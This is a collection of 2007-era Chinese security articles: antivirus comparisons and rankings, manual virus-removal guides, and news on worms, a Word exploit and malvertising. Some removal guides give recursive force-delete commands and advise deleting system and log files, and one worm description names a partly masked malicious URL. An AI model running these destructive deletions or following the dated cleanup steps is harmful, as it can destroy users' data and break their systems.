在以前的文章中我们曾提到CNN由于未能及时更新它的防毒软件，遭到了一种“本可以被及时检测到”蠕虫病毒的攻击。“矛”与“盾”永远都是并存的，不可能出现某一个完全盖过另一个的情况，只能是或者二者并存、或者二者同消失。也就是说，二次挂马事件的出现，除了是因为出现了新的“矛”，更是因为“盾”的上面再一次出现了漏洞，给了“矛”以可乘之机。

有则改之，出现了问题并不可怕，怕的是不知道这个问题是如何出现的，怕的是我们不知道如何去防范、避免问题的再次出现。

安全网站它代表的不仅仅是一个公司、一个集团，它更是网络安全斗争的最前沿。当它连自身的安全都无法保证时，又让普通用户去如何面对日趋危险的网络世界，又让普通用户去如何知道除了自己还有谁能来帮助他抵御网络威胁的入侵。

当安全网站也被击倒了，我们还能信任谁！安全网站的安全谁来保证？

相关资料

MS07-004漏洞：是Microsoft公司多个版本的操作系统对矢量标记语言（VML）的支持存在整数溢出，导致可以执行任意指令，使的远程攻击者可以利用此漏洞控制用户机器。

东方卫士：交大铭泰信息安全公司，国内知名信息安全厂商，该公司提供《东方卫士》系列防病毒产品、数据保护、无毒网关产品、防垃圾邮件产品、网络设备及系统集成和 OEM 定制服务。

保障安全 杀毒软件让你的电脑更坚强

作者：lvvl　来源：赛迪网安全社区

在享受互联网为工作和生活带来便利的同时，人们也不可避免地面临着各种病毒的滋扰。

病毒和杀毒软件就像矛和盾，面对种类不断变化和杀伤力不断增强的病毒，电脑系统、商业机密、个人隐私面临着巨大的威胁，采取适合自己的防杀病毒的工具也就成为人们有效防护网络安全的盾牌。该选择怎样的杀毒软件来保护你的电脑呢？现在的杀软更新真是快，2006的硝烟尚未散去，国产三巨头的2007版本便粉墨登场了。看看在对几款主流杀毒软件做出的比较后，你是不是会更好地选择了呢？

国内杀毒软件

金山毒霸 2007

该软件最强悍的功能就是加入了杀壳的功能。加壳的病毒木马一直是国内的杀毒软件检测不出来的，金山毒霸2007这一特点无疑为其增添不少魅力。

金山毒霸2007是一款功能强大、方便易用的个人及家庭首选反病毒产品，包括金山毒霸、金山网镖、金山反间谍和金山漏洞修复。金山毒霸脱壳引擎模块的发布，大幅度改善了金山毒霸对已知计算机病毒被人为加壳后的查杀能力，以及由于壳的原因带来的对已知计算机病毒查杀能力的问题。

江民杀毒软件KV2007

可有效清除20多万种已知计算机病毒、蠕虫、木马、黑客程序、网页病毒、邮件病毒、脚本病毒等，全方位主动防御未知病毒，新增流氓软件清理功能。

新推出第三代BOOTSCAN系统启动前杀毒功能支持全中文菜单式操作，使用更方便，杀毒更彻底。

新增可升级光盘启动杀毒功能，可在系统瘫痪状态下从光盘启动电脑并升级病毒库进行杀毒。该软件还具有反黑客、反木马、漏洞扫描、垃圾邮件识别、硬盘数据恢复、网银网游密码保护、IE助手、系统诊断、文件粉碎、可疑文件强力删除、反网络钓鱼等十二大功能。

瑞星杀毒软件2007

基于第八代虚拟机脱壳引擎(VUE)研制开发的新一代信息安全产品，能准确查杀各种加壳变种病毒、未知病毒、黑客、木马、恶意网页、间谍软件、流氓软件等有害程序，在病毒处理速度、病毒清除能力、病毒误报率、资源占用率等主要技术指标上实现了新的突破。

用户可以免费下载安装包，具有免费查毒和实时监控功能，无需用户每次都连接到互联网就能免费查毒。

瑞星“虚拟机脱壳”引擎(VUE)，是在计算机中构建一个仿真的运行环境，让加壳病毒在运行中自行脱壳、还原到原始形态，这样就能方便、彻底地将病毒清除掉，它还可以将杀毒软件的病毒库减小1/3，并极大降低对系统资源的占用，使电脑运行得更流畅。

国外杀毒软件

卡巴斯基

Kaspersky(卡巴斯基)杀毒软件来源于俄罗斯，是世界上最优秀、最顶级的网络杀毒软件，查杀病毒性能远高于同类产品。

卡巴斯基杀毒软件具有超强的中心管理和杀毒能力，能真正实现带毒杀毒，提供了广泛的抗病毒解决方案。

该软件提供了所有类型的抗病毒防护：抗病毒扫描仪，监控器，行为阻断和完全检验，支持几乎所有的普通操作系统、e-mail通路和防火墙。

诺顿

诺顿杀毒软件是赛门铁克公司的产品，在国际上具有很高的知名度。诺顿杀毒软件可帮你侦测上万种已知和未知的病毒。

当你从磁盘、网络上、e-mail夹档中开启文件时便会自动侦测文件的安全性，若文件内含病毒，便会立即警告，并作适当的处理。

诺顿具有防御非病毒性威胁，同病毒一样，间谍程序、击键记录程序等非病毒性威胁也会危害电脑的安全。诺顿防病毒可以通过扫描检测到这些威胁，并且针对这些非病毒性威胁提供持续的防护更新。

McAfee

全球最畅销的杀毒软件之一，除了操作界面更新外,也增加了许多新功能。除了帮你侦测和清除病毒，它还有VShield自动监视系统，会常驻在System Tray，当你从磁盘、网络上、e-mail文件夹中开启文件时便会自动侦测文件的安全性，若文件内含病毒，便会立即警告，并作适当的处理。

该软件还支持鼠标右键的快速选单功能，并可用密码将个人的设定锁住，让别人无法乱改你的设定。

系统维护软件

对于初级用户来说，学会了电脑的基本操作，最头痛的就是安全问题。时不时的死机和病毒的侵害、数据的丢失以及网络安全问题都是我们时刻面临的威胁，因此，有必要使用系统维护软件维护系统的正常运行。

维护操作系统

一键还原精灵

一键还原精灵是一种备份C盘的软件，而且可以免费使用。

与ghost手工备份不同的是，一键还原精灵在安装时先在硬盘最末部分分割出一个分区，用来存放备份。为了防止被误删，该分区是隐藏的，在Windows资源管理器里看不到，而且备份文件位于隐藏分区，不受病毒感染。

一旦系统崩溃，使用者按指导操作即可将已备份系统盘符下的所有文件还原。

维护硬盘

Windows优化大师

Windows优化大师小巧的系统信息查看、清理、维护等功能强大，能够全面扫描出计算机中的硬件信息和系统中的垃圾、错误。注册用户还可以得到硬件优化方案，方便快捷地清除扫描出的垃圾和错误。

超级兔子

超级兔子是完整的系统维护工具，可以清理大多数的文件、注册表里面的垃圾，同时还有强力的软件卸载功能，可以清理应用软件在电脑内的所有记录。

其中，超级兔子上网精灵具有IE修复、IE保护、恶意程序检测及清除工能，还能防止其他人浏览网站，阻挡色情网站，以及端口的过滤。超级兔子系统检测可以诊断一台电脑系统的CPU、显卡、硬盘速度，还有磁盘修复及键盘检测功能。

对付流氓软件

360安全卫士

360安全卫士是奇虎公司推出的反流氓软件的得力工具，更新很快，基本上每周都会更新特征库。有流氓软件清理、系统进程监控、系统全面诊断等功能，还辅助有IE历史文件、cook-ie、自动保存的密码清理等功能。

卸载软件

完美卸载

完美卸载软件可以在安装软件时监视系统状态，详细记录新装软件在系统中的存储情况，以及在注册表中的新加项目。到目前为止，完美卸载软件都是免费对外的，并且提供免费实时升级。

顺序依旧 2007年世界顶级杀毒软件排名

作者：fenglimei　来源：赛迪网IT博客

Toptenreviews 已经发布了2007年度的世界杀毒软件排名，与2006年名单相比，这两个排名几乎没有什么区别。也许你会注意到其中惟一的区别是第九名由原来的 eTrust EZ Antivirus 变成了 CA Antivirus，但这两个不同的名字其实还是同一款产品，或许只是因为 CA 公司认为 CA Antivirus 记起来方便得多，于是改了个名字而已。所以，这两个名单还是完全一致的。

2007 年世界顶级杀毒软件排名：

金奖：BitDefender

BitDefender 杀毒软件是来自罗马尼亚的老牌杀毒软件，二十四万超大病毒库，它将为你的计算机提供最大的保护，具有功能强大的反病毒引擎以及互联网过滤技术，为你提供即时信息保护功能，通过回答几个简单的问题，你就可以方便的进行安装，并且支持在线升级。

它包括：1. 永久的防病毒保护；2. 后台扫描与网络防火墙；3. 保密控制；4. 自动快速升级模块；5. 创建计划任务；6. 病毒隔离区。

银奖：Kaspersky

Kaspersky （卡巴斯基）杀毒软件来源于俄罗斯，是世界上最优秀、最顶级的网络杀毒软件，查杀病毒性能远高于同类产品。卡巴斯基杀毒软件具有超强的中心管理和杀毒能力，能真正实现带毒杀毒！提供了一个广泛的抗病毒解决方案。它提供了所有类型的抗病毒防护：抗病毒扫描仪、监控器、行为阻段、完全检验、E-mail 通路和防火墙。它支持几乎是所有的普通操作系统。卡巴斯基控制所有可能的病毒进入端口，它强大的功能和局部灵活性以及网络管理工具为自动信息搜索、中央安装和病毒防护控制提供最大的便利和最少的时间来建构你的抗病毒分离墙。卡巴斯基抗病毒软件有许多国际研究机构、中立测试实验室和 IT 出版机构的证书，确认了卡巴斯基具有汇集行业最高水准的突出品质。

铜奖：F-Secure Anti-Virus

来自 Linux 的故乡芬兰的杀毒软件，集合 AVP、LIBRA、ORION、DRACO 四套杀毒引擎,其中一个就是 Kaspersky 的杀毒内核，而且青出于蓝胜于蓝，个人感觉杀毒效率比 Kaspersky 要好，该软件采用分布式防火墙技术，对网络流行病毒尤其有效。在《PC Utilites》评测中超过 Kaspersky 名列第一，但后来 Kaspersky 增加了扩展病毒库，反超 F-secure。鉴于普通用户用不到扩展病毒库，因此 F-secure 还是普通用户很不错的一个选择。F-Secure AntiVirus 是一款功能强大的实时病毒监测和防护系统，支持所有的 Windows 平台，它集成了多个病毒监测引擎，如果其中一个发生遗漏，就会有另一个去监测。可单一扫描硬盘或是一个文件夹或文件，软件更提供密码的保护性，并提供病毒的信息。

第四名：PC-cillin

趋势科技网络安全个人版集成了包括个人防火墙、防病毒、防垃圾邮件等功能于一体，最大限度地提供对桌面机的保护并不需要用户进行过多的操作。在用户日常使用及上网浏览时，进行"实时的安全防御监控"；内置的防火墙不仅更方便您使用因地制宜的设定，"专业主控式个人防火墙"及"木马程序损害清除还原技术"的双重保障还可以拒绝各类黑客程序对计算机的访问请求；趋势科技全新研发的病毒阻隔技术，包含"主动式防毒应变系统"以及"病毒扫瞄逻辑分析技术"不仅能够精准侦测病毒藏匿与化身并予以彻底清除外，还能针对特定变种病毒进行封锁与阻隔，让病毒再无可趁之机；强有力的"垃圾邮件过滤功能"为您全面封锁不请自来的垃圾邮件。

趋势科技网络安全个人版的诸多功能确保您的电脑系统运作正常，从此摆脱病毒感染的恶梦。

第五名：ESET Nod32

国外很权威的防病毒软件评测给了 NOD32 很高的分数，在全球共获得超过 40 多个奖项，包括Virus Bulletin、PC Magazine、ICSA、Checkmark认证等，更加是全球唯一通过 26 次 VB 100% 测试的防毒软件，高据众产品之榜首！产品线很长，从 DOS、Windows 9x/Me、Windows NT/XP/2000，到Novell Netware Server、Linux、BSD 等，都有提供。可以对邮件进行实时监测，占用内存资源较少，清除病毒的速度效果都令人满意。

第六名：McAfee VirusScan

全球最畅销的杀毒软件之一，McAfee 防毒软件，除了操作介面更新外，也将该公司的 WebScanX 功能合在一起，增加了许多新功能！除了帮你侦测和清除病毒，它还有 VShield 自动监视系统，会常驻在 System Tray，当你从磁盘、网络上、E-mail 夹文件中开启文件时便会自动侦测文件的安全性，若文件内含病毒，便会立即警告，并作适当的处理，而且支持鼠标右键的快速选单功能，并可使用密码将个人的设定锁住让别人无法乱改你的设定。

第七名：Norton AntiVirus

Norton AntiVirus 是一套强而有力的防毒软件，它可帮你侦测上万种已知和未知的病毒，并且每当开机时，自动防护便会常驻在 System Tray，当你从磁盘、网路上、E-mail 夹档中开启档案时便会自动侦测档案的安全性，若档案内含病毒，便会立即警告，并作适当的处理。另外它还附有 LiveUpdate 的功能，可帮你自动连上 Symantec 的 FTP Server 下载最新的病毒码，於下载完后自动完成安装更新的动作。

第八名：AVG Anti-Virus

AVG Anti-Virus 欧洲有名的杀毒软件，AVG Anti-Virus System 功能上相当完整，可即时对任何存取文件侦测，防止电脑病毒感染；可对电子邮件和附加文件进行扫瞄，防止电脑病毒透过电子邮件和附加文件传播； "病毒资料库"里面则记录了一些电脑病毒的特性和发作日期等相关资讯；"开机保护"可在电脑开机时侦测开机型病毒，防止开机型病毒感染。在扫毒方面，可扫瞄磁碟片、硬盘、光盘机外，也可对网络磁碟进行扫瞄。在扫瞄时也可只对磁碟片、硬盘、光盘机上的某个目录进行扫瞄。可扫瞄文件型病毒、巨集病毒、压缩文件 (支持 ZIP、ARJ、RAR 等压缩文件即时解压缩扫描)。在扫瞄时如发现文件感染病毒时会将感染病毒的文件隔离至 AVG Virus VauIt，待扫瞄完成后在一并解毒。支持在线升级。现在提供了最新的免费版供大家使用，安装之前先去官方网站填个表，从回信中得到一个序列号。AVG Anti-Virus 有三个版本(专业、服务器、免费)，其中有个人非营利使用的免费版本，功能完整，但是仅某部份功能是无法设定的，例如扫毒排程只能每天一次等等。

第九名：CA Antivirus

就是反病毒软件 eTrust EZ Antivirus 已经获得了国际计算机安全协会（ICSA:International Computer Security Association）的认证。ICSA 专门负责检测和认证产品对来自病毒及恶意代码的攻击的有效性。CA 公司表示，在 ICSA 的测试中，CA Antivirus 软件甚至连"In-The-Wild"恶性病毒也可以 100% 地检测出来。

CA Antivirus 是一种主要为中小型企业及 SOHO 用户提供解决方案的反病毒软件。该产品支持的操作系统包括 Windows 98、Windows ME、Windows NT 以及 Windows 2000 Professional 等。除此以外，CA 公司还提供包括 CA Antivirus 在内的反病毒解决方案组件"eTrust EZ Armor"。新版本采用全新用户界面，更加易于使用；新的文件隔离功能可有效防止系统文件被误删；改进了帮助系统；增强了"闪动"系统托盘图标功能。

第十名：Norman Virus Control

Norman Virus Control 是欧洲名牌杀毒软件，为了确保您的计算机系统得到最好的保护，Norman 数据安全系统提供了多种防毒工具供您选择，以满足您的不同需要。此产品结合了先进的病毒扫描引擎、启发式分析技术以及宏验证技术，可有效查杀已知和未知病毒。NVC 可以查杀所有类型的病毒，包括文件和引导扇区病毒而无需使用杀毒软件重新启动开机。

第十一名：AntiVirusKi

AntiVirusKit 2006 是德国G-Data公司产品，英文全名是 GData AntiVirusKit，简称 AVK，这是一款采用 KAV 和 BitDefender(BD) 罗马尼亚杀毒软件的双引擎杀毒软件，具有超强的杀毒能力，在国外拥有非常高的知名度，运行速度稳定，具有病毒监控、EMAIL 病毒拦截器、EMAIL 防护、支持在线自动更新等功能，可以阻挡来自互联网的病毒、蠕虫、黑客后门、特洛伊木马、拨号程序、广告软件、间谍软件等所有威胁，支持对压缩文件、电子邮件即时扫描，支持启发式病毒扫描，支持密码保护，有详细的日志方便查询，对计算机提供永久安全防护。AVK 最大优点是，只要病毒或木马录入病毒库，它在病毒运行前拦截，不会出现中毒后再杀毒的情况。 AVK2006 目前病毒库已经超过 33W 卡吧 / BD 双杀毒引擎效果绝对一流！

第十二名：AVAST

第十三名：Panda Titanium

第十四名：F-Prot

第十五名：PCTools AntiVirus

第十六名：ViRobot Expert

第十七名：WinAntiVirus

清除那些使得隐藏文件无法显示的病毒

清除那些使得隐藏文件无法显示的病毒

作者：lvvl　来源：赛迪网安全社区

选择“显示隐藏文件”这一选项后，发现U盘有个文件闪出来一下就马上又消失了，而再打开文件夹选项时，发现仍就是“不显示隐藏文件”这一选项。而且刚发现点击C、D等盘符图标时会另外打开一个窗口！

总结：

I、病情描述：

1、无法显示隐藏文件；

2、点击C、D等盘符图标时会另外打开一个窗口；

3、用winrar查看时发现C、D等根目录下有autorun.inf和tel.xls.exe两个恶心的文件；

4、任务管理器中的应用进程一栏里有个莫明其妙的kill；

5、开机启动项中有莫明其妙的SocksA.exe。

II、解决办法：

用了一些专杀工具和DOS下的批处理文件，都不好使，只好DIY。注意在以下整个过程中不要双击硬盘分区，需要打开时用鼠标右键—>打开。

一、关闭病毒进程

在任务管理器应用程序里面查找类似kill等你不认识的进程，右键—>转到进程，找到类似SVOHOST.exe（也可能就是某个svchost.exe）的进程，右键—>结束进程树。

二、显示出被隐藏的系统文件

开始—>运行—>regedit

HKEY_LOCAL_MACHINE\Software\Microsoft\windows\CurrentVersion\explorer\

Advanced\Folder\Hidden\SHOWALL

删除CheckedValue键值，单击右键 新建—>Dword值—>命名为CheckedValue，然后修改它的键值为1，这样就可以选择“显示所有隐藏文件”和“显示系统文件”。

三、删除病毒

在分区盘上单击鼠标右键—>打开，看到每个盘跟目录下有autorun.inf 和tel\.xls\.exe 两个文件，将其删除，U盘同样。

四、删除病毒的自动运行项

开始—>运行—>msconfig—>启动—>删除类似sacksa.exe、SocksA.exe之类项，或者打开注册表运行regedit

HKEY_LOCAL_MACHINE>SOFTWARE>Microsoft>Windows>CurrentVersion>Run

删除类似C:\WINDOWS\system32\SVOHOST.exe 的项。

五、删除遗留文件

C:\WINDOWS\ 跟 C:\WINDOWS\system32\ 目录下删除SVOHOST.exe(注意系统有一个类似文件，图标怪异的那个类似excel的图标的是病毒)session.exe、sacaka.exe、SocksA.exe以及所有excel类似图标的文件，每个文件夹两个，不要误删哦，自己注意。重启电脑后，基本可以了。

如何在无法打开驱动器情况下杀毒的方法

作者：lvvl　来源：赛迪网安全社区

昨天将U盘插到电脑后双击无法打开，紧接着双击所有驱动器盘符都没有办法打开，试验以后发现只有使用资源管理器可以。但终究不爽，鬼知道病毒在电脑里还干了些什么，决定彻底杀掉。

症状描述：

1.双击驱动器盘符无法打开，资源管理器可以使用。

2.在开始→运行里输入cmd进入命令行模式，输入C:回车，进入C盘根目录，输入dir/a查看所有文件，发现存在如下两个文件：Autorun.inf RavMon.exe。

3.在开始→运行里输入msconfig，进入系统配置程序，选择“启动”标签，里面有一个叫做“MDM”的项指向“C:\windows＼mdm.exe”。

解决方法：

1.重新启动，开机时按F8，进入带命令行的安全模式，选择Administrator账号登陆。

2.在命令行下输入regedit进入注册表，查找"RavMon.exe"，如果发现匹配项就删除（我没有发现，这样做是保险起见）。注意RsRavMon是瑞星杀毒软件，不用删除。

3.在命令行下输入msconfig，进入系统配置程序，选择“启动”标签，将所有“MDM”项前面的勾去掉（我删了一个还有一个，md），保存。

4.在命令行下输入以下指令：del C:\Autorun.inf /f /s /q /a del C:\RavMon.exe /f /s /q /a del D:\Autorun.inf /f /s /q /a del D:\RavMon.exe /f /s /q /a ……有多少盘符输多少个。注意这个指令会删除根目录往下所有目录的对应文件，所以大家看到删除了根目录下的以后马上按Ctrl+C中断。

5.重新启动，ok啦。

6.要彻底清楚，主要还是要把U盘里的毒源杀掉。我没有试别的办法，直接偷懒进Linux下用rm删了个干净。如果大家认识的人有装Linux的可以请他帮忙，个人认为这样做是最安全的。在Windows/Dos平台下怎么做还请高手出招。

说明：1.MDM是微软的Machine Debug Manager，系统进程；病毒伪装成了mdm.exe。2.本杀毒方法思想可用于清除类似病毒。

小心被敲诈　警惕恶意QiaoZhaz.d木马

作者：h24arj　来源：赛迪网安全社区

Trojan.Win32.QiaoZhaz.d属木马类，病毒运行后弹出对话框，内容为“发现您硬盘内曾使用过盗版了的我公司软件 , 所以将您部份文件移到锁定了的扇区 , 若要解锁将文件释放 , 请电邮 liugongs19670519@yahoo.com.cn 购买相应的软件”。在 2000 系统下点击确定后不自动注销。XP 系统下点击确定后系统会自动注销，由于病毒加载了启动项，所以开机病毒会自动运行，会继续弹出对话框，反复循环。病毒衍生文件到系统目录下，在启动文件夹内衍生病毒文件，并重命名为 svchost.exe 。创建服务，并以服务的方式达到随机启动的目的。去除“文件夹选项”，使用户无法选择“显示所有隐藏文件”和不能去掉“隐藏受保护的系统文件”“隐藏已知文件类型的扩展名”。去除开始菜单中的“搜索”、“运行”项和“关机”项，使用户不能使用搜索、 command 命令和关机、注销。修改 txt 文件关联，当用户试图运行 txt 文件时，则会激活病毒，同样的办法修改任务管理器关联，无论用户怎样打开任务管理器，都会激活病毒。病毒把屏保时间修改为60 秒，在 %system32% 文件夹下生成病毒屏保文件，当用户 60 秒不操作计算机时，系统会自动运行病毒。该病毒利用多种方法来保护自身。删除非系统盘外的所有文件，并在每个盘符下建立一个名为：警告 .h 的文件。该病毒的行为极其恶劣，不停的弹出对话框，对用户进行敲诈勒索。

清除方案：删除对应文件，恢复相关系统设置。

(1)首先关闭下列病毒进程：

win1ogon.exe

svchost.exe

(2)删除病毒文件：

%Documents and Settings%\All Users\Application Data\Microsoft\win1ogon.exe

%Documents and Settings%\All Users\ 「开始」菜单 \ 程序 \ 启动 \svchost.com

%Documents and Settings%\All Users\ 桌面 \ 警告 .h

%Documents and Settings%\commander\Local Settings\Temp\E_4\krnln.fnr

%Documents and Settings%\commander\NTUSER.DAT.LOG

%WINDIR%\Debug\UserMode\userenv.log

%WINDIR%\setupapi.log

%system32%\CatRoot2\dberr.txt

%system32%\config\default.LOG

%system32%\config\software.LOG

%system32%\config\system.LOG

%system32%\taskmgr.exe

%system32%\wins.com

%system32%\ 飞越星球 .scr

(3)将下列内容导入注册表里，

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\

Hidden\SHOWALL]

"CheckedValue"=dword:00000001

"DefaultValue"=dword:00000002

"HelpID"="shell.hlp#51105"

"HKeyRoot"=dword:800000001

"RegPath"="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced"

"Text"="@shell32.dll,-30500"

"Type"="radio"

"ValueName"="Hidden"

[HKEY_CURRENT_USER\Control Panel\Desktop]

"ScreenSaveTimeOut"="900"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]

"Hidden"=dword:00000001

"HideFileExt"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]

"NoDriveTypeAutoRun"=dword:000000ff

[HKEY_CLASSES_ROOT\txtfile\shell\open\command]

@="C:\\WINDOWS\\notepad.exe %1"

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]

[HKEY_CURRENT_USER\Control Panel\Desktop]

"SCRNSAVE.EXE"="nothing"

[-HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

"svchost.exe"="nothing"

[-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WINS ]

(4)在其他干净的系统拷贝一个taskmgr.exe文件，把它复制到C:\windows\system32目录下，覆盖原文件即可。

看电影永不中招 查杀RMVB中的病毒

太平洋电脑网

清除视频中的木马

　　要防范夹带了网页木马的RMVB文件，在播放前，只要去掉视频剪辑信息中的网页资料就可以解决问题了，方法很简单。

1.利用Helix Producer Plus去除网页木马

　　如果电脑中安装有软件“Helix Producer Plus”，可利用该软件来清除视频中夹带木马的剪辑信息。

　　首先用记事本建立一个名为“1.txt”的空白文本文件，然后在命令提示符窗口中执行如下命令:

　　“"C:\Program Files\Real\Helix Producer Plus\RealMediaEditor\rmevents.exe" -i C:\龙虎门.rm -e 1.txt -o C:\龙虎门2.rmvb”

　　命令执行后，就可以将原有RM视频中的剪辑信息覆盖，也就间接的清除了木马。

2.自动过滤木马——Real媒体过滤器

　　“realfilter.exe”(Real媒体过滤器)是一个解决RMVB视频网页木马问题的小工具，无需安装Helix Producer Plus，使用非常的方便。运行程序后，点击“源文件”按钮，指定要清除网页木马的RMVB视频文件;然后在“另存为”中指定保存路径，最后点击“开始过滤”按钮，即可开始清除Real视频中的各种网页木马和广告信息了。

　　如果设置了“显示过滤进度”项，那么可以看到“realfilter.exe”实际上是调用了Helix Producer Plus的“rmevents.exe”插件程序进行过滤清除的，在弹出的命令窗口中可以看到清除过滤进度。清除完毕后，弹出完成提示对话框，并显示清除了视频中的多少信息及文件减小的体积，现在得到的就是一个去掉木马网页或广告的干净视频了。

太强了!黑客竟用Word漏洞胁持用户电脑

太强了!黑客竟用Word漏洞胁持用户电脑

出处：PConline

作者：李小光

　　3月9日，一个利用微软严重WORD文档格式漏洞进行攻击的恶意DOC文档被截获。据金山毒霸反病毒专家戴光剑称，该DOC文档可能与Office最新安全漏洞有关。

　　据戴光剑介绍，只要存在WORD文档格式漏洞的电脑都有可能受到该恶意DOC文档的攻击，受攻击后的电脑，将会随机生成扩展名不固定的相关文件，用户只要将鼠标停留在该文件上，资源管理器立刻停止运行，并造成Explorer.exe崩溃。

　　戴光剑表示，与以往的文档漏洞样本不同的是，目前这个DOC漏洞攻击文件很可能只是一种广告性质，真正的病毒可能是私下交易并进行定点攻击，但一旦该漏洞被病毒恶意利用，及有可能引发大面积感染，大量用户将面临电脑被“挟持”的危险。

　　据悉，该漏洞涉及MS Office 2003/2007版本，但在微软2月公布的安全报告中没有关于该漏洞的描述。

双击盘符要小心 “麦戈兽”病毒在捣乱

作者：塞北|谷子熟了吗　来源：赛迪网安全社区

上海计算机病毒防范服务中心日前发出警报，本周一种专门破坏可执行文件的病毒“麦戈兽变种A”在互联网出现。这种病毒感染性较强，并可以自动在网上下载盗号木马病毒，危害性较强。

这种病毒是一个活跃于windows平台的感染型病毒，它会搜寻并感染用户本地磁盘上的所有*.exe文件，破坏磁盘中数据文件和资料。

防病毒专家介绍，这种病毒的危害性主要是通过链接网络，自动下载其他的木马病毒到用户终端上，对用户的电脑系统的安全构成严重的威胁。

该病毒运行后，会把自身复制为internet.exe。在系统中每个磁盘根目录下创建autorun.inf和setup.exe病毒文件。当用户双击盘符时，立即激活病毒。而且当用户启动IE时，它会自动链接到恶意站点h**p://mm.21380.com/txt.txt或h**p://mm.21380.com/txt.txt，并下载病毒配置文件。此外，它还会解密病毒配置文件，下载并运行其他多个盗号木马病毒。

专家提醒，一旦中了这种病毒，就可能下载并运行多个盗号木马病毒，将对用户的各种电子账号、密码造成威胁，也可能造成用户虚拟财产的损失。所以用户不要运行不知名程序或打开陌生人邮件的附件，特别要防范带有欺骗性的病毒邮件。

牟利为目的　“仇英”病毒模仿熊猫烧香

作者：lvvl　来源：赛迪网安全社区

"熊猫烧香"系列病毒的作者才刚刚被抓获，另一个非常类似的蠕虫病毒"仇英（Worm.Chouying.a）"被瑞星全球反病毒监测网截获，其作者宣称"出售本程序及源代码,并可以按照用户要求定做其他功能"，为了方便购买者联系，他甚至留下了自己的QQ号码。

根据瑞星反病毒专家的分析，"仇英"病毒的功能与"熊猫烧香"非常相似，在传播能力和自我保护能力上甚至有所超出。但病毒作者似乎目前只想推销自己的"产品"，并没有加入太多的高级功能，诸如窃取网络游戏密码、QQ密码、更换文件显示图片等。不过在病毒中作者附上了"产品说明"，称可以为购买者量身定做上述功能。

据分析，该病毒采用DLL插进程技术隐藏自身，并采用保护机制对抗清除；运行后会感染所有可执行PE文件和所有网页文件，可能造成中毒机器蓝屏、运行缓慢等现象；病毒会自动在企业局域网中传播，传播速度很快。与"熊猫烧香"相比，该病毒占用内存资源少，在安全模式下也可以正常启动，因此清除难度极大。

更为疯狂的是，被此病毒感染的网页中都会被插入一句话，"出售本程序及源代码，联系QQ ******"，这是病毒作者在为自己打广告。瑞星专家猜测，近一段时期以来，由于媒体上关于"熊猫烧香"病毒获取利益的报道过于集中，直接刺激了这些病毒作者的贪欲，不惜铤而走险。

反病毒专家提醒广大用户，"熊猫烧香"以及刚出现的"仇英"等病毒之所以传播范围广、危害大，是因为利用了网民机器上的漏洞，只有及时弥补系统漏洞，安装正版杀毒软件并及时升级，才可以有效狙击此类病毒的疯狂进攻。有关该病毒的详细资料，瑞星已经及时通报给相关部门，等待病毒作者的将是严厉的法律制裁。

MSN 信使多日显示恶意软件的图片广告

作者：smtk　来源：赛迪网安全社区

微软公司的MSN信使（新版叫做live信使）连续几天显示的图片广告将会在用户的电脑上安装恶意软件。微软对此表示道歉。

据报道，微软MSN信使显示的一个图片广告推广的是一个名叫“Errorsafe”的软件。这个软件自称可以检测并修补电脑中存在的漏洞。然而，它实际上是一款臭名昭著的恶意软件。在未经用户批准的情况下，它将强行安装。之后，它将会发布虚假的安全警告，以便催促用户购买收费的正式版软件。

微软公司对外承认此次失误，并表示已经将这一恶意软件的广告删除。微软公司的一个公关代表说，微软对于给用户造成的不便表示道歉，目前微软正在对广告批准过程进行审核，以避免类似事件再次发生。 一名微软mvphardmeier表示，这个事件对于MSN信使、MSN门户和微软公司的用户来说是一个非常糟糕的消息。

据报道，图片广告已经成为恶意软件厂商“作恶”的另外一个途径。他们可以将恶意制作的网页和程序放到网站上，并通过在一些正规产品的广告诱导用户点击。一旦用户访问恶意网页，恶意软件将长驱直入用户系统，从而让用户“中招”。

Google桌面搜索软件仍然暗藏安全漏洞

作者：smtk　来源：赛迪网安全社区

日前在Google桌面搜索软件(Google desktop search)上发现了一个潜在破坏危险的安全漏洞，该漏洞允许黑客窃取用户私人数据。

Google公司表示，经过数周安全数据处理，目前已经发布了相关漏洞的修复补丁，并表示“没有收到来自用户针对该漏洞的攻击报告”。

存在于Google桌面搜索软件上的这一安全漏洞是于去年年末被安全分析咨询商watchfire公司首先发现的。watchfire的研究员丹尼·艾伦(danny allan)表示，尽管这一安全漏洞存在于当前80%的网络软件上，但对于Google desktop search软件来说“该漏洞严重制约了Google桌面搜索软件的使用”。

Google桌面搜索软件于2004年推出，目前吸引了数百万用户。Google的桌面搜索软件把搜索的触角伸展到了硬盘上的每个角落，蔓延到文件的字里行间，依托Google强大的搜索技术，不但可以闪电般的速度找出硬盘上的文件，而且能够搜索出所有包含关键字的outlook邮件、历史浏览网页、word文档、文本文件。互联网追踪调查公司hitwise称Google桌面搜索网站desktop.Google.com在今年一月份的流量同比增长了三倍。

Watchfire公司称，watchfire在今年1月4日通知了Google公司这一可能引起交叉资料站脚本攻击 (cross-site scripting)的安全漏洞的存在；2月1日，watchfire发现这一漏洞已经被修复。

Google公司发言人巴里·斯尼特(barry schnitt)表示，由于Google desktop search属于自动升级软件，因此用户没有必要采取其他措施来应对该安全漏洞。

尽管Google在第一时间修复了这一安全漏洞、堵上了黑客侵袭的后门，但watchfire公司表示，由于Google的桌面搜索软件提供了pc桌面和网络两个领域的数据连接，这很可能引发新的安全漏洞。watchfire公司的创始人兼首席技术官麦克·韦德(mike weider)说，“这种情况下Google桌面搜索软件还存在极高的潜在威胁”。

Google公司的斯尼特在一封电子邮件中称，Google已采取多种措施来保护用户、降低类似攻击发生的可能。

通过实例来学习与信息加密相关的技术

通过实例来学习与信息加密相关的技术

作者：smtk　来源：赛迪网安全社区

